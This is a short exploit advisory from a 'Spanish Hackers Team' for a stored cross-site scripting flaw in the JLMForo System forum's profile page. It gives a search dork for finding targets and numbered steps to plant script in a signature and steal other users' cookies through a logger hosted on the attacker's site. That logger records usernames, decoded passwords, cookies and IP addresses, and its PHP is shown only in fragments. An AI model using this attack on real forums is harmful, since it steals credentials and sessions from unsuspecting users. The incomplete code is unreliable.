# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Góngora Fernández / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer
# Explanation Basic :
1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait to an answer to visualize the XSS
# To Rob Cookies:
1º- Register in the forum (registro.php)
2º- Put in your signature the XSS (modificarPerfil.php):
3º- Upload in your Site:
USUARIO Y PASSWORD: '.base64_decode($usuario).'
Cookie: '.$cookie.'
Pagina: '.$re.'
IP: ' .$ip. '
Fecha y Hora: ' .$fecha. '');
4º- Chmod 777 archive
5º- Create a subject
6º- Wait to an answer to run the XSS
Greetz To: All Hackers
Jose Luis Góngora Fernández / JosS!